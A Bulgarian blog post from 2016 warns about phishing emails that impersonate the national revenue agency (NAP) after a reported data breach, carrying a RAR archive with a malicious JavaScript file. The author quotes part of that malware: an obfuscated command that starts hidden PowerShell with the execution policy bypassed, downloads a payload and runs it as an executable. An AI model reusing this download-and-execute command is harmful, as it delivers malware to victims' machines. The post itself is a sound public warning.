Потребителски вход

Запомни ме | Регистрация
Постинг
07.10.2016 22:24 - Поредния пробив в базата на НАП
Автор: akrachev Категория: Технологии   
Прочетен: 361 Коментари: 0 Гласове:
1


Постингът е бил сред най-популярни в категория в Blog.bg
 Тъй като не гледам телевизия, не разбрах своевременно, че е имало пробив тези дни в системата на НАП и са били изтеглени данни на респондентите, та ми се наложи на практика да се запозная със случая.

Въпросните хакери след като за изтеглили електронните адреси, изпращат към тях писма със заглавие "Уведомление относно промени в регламента за подаване на декларации към НАП"  и подател Национална агенция за приходите

В писмото има прикачен файл известие_432439.rar, което разбира се съдържа Windows scripting host зловреден код. Дано всички счетоводители да гледат телевизия и да са спокойни, когато са получили писмото. 

Аз лично като видях .js файла в RAR архива си помислих, че вероятно ще тегли софтуер от НАП. Чак като се зачетох вътре и видях "var soghax = WScript.CreateObject("WScRIPt.SHEll");
if (typeof scyqwy() == "number") { var zexofhimq = "CMd.Exe /c " + mhymukod + " -eXecu^TIo^N^poli^cy^ BYpasS  -N^o^prOfi^lE^     -w^indOW^s^tyLe   ^h^iDDen^ (NEW^-ObJEcT    ^S^y^STEM^.N^et^.w^e^b^cl^Ien^T).^do^wn^lOADfile(^"" + zxytu + "c.bin" + "","%ApPdaTa%.EXE");sTaRT-pR^o^CE^s^S "%AppdATA%.eXe""; "
разбрах, че нещо не е наред...







Гласувай:
1
0



Няма коментари
Търсене

За този блог
Автор: akrachev
Категория: Лични дневници
Прочетен: 214178
Постинги: 165
Коментари: 53
Гласове: 72
Календар
«  Август, 2018  
ПВСЧПСН
12345
6789101112
13141516171819
20212223242526
2728293031